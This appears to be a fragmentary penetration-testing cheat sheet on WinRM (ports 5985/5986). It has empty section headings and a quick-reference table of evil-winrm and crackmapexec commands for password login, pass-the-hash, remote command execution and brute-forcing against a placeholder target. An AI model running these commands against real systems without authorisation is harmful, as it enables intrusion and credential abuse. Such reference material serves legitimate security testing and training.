Service Detection
| Port | Protocol |
|---|---|
| 5985 | HTTP (WinRM) |
| 5986 | HTTPS (WinRM) |
Evil-WinRM
With SSL
Upload / Download
Load PowerShell Scripts
CrackMapExec
| Flag | Description |
|---|---|
-x | CMD command |
-X | PowerShell command |
PowerShell Remoting (From Windows)
Execute Command
Brute-Force
Pass-the-Hash
Quick Reference
| Check | Command |
|---|---|
| Login | evil-winrm -i TARGET -u user -p pass |
| PtH | evil-winrm -i TARGET -u user -H HASH |
| Exec CMD | crackmapexec winrm TARGET -u user -p pass -x "whoami" |
| Brute-force | crackmapexec winrm TARGET -u users.txt -p pass.txt |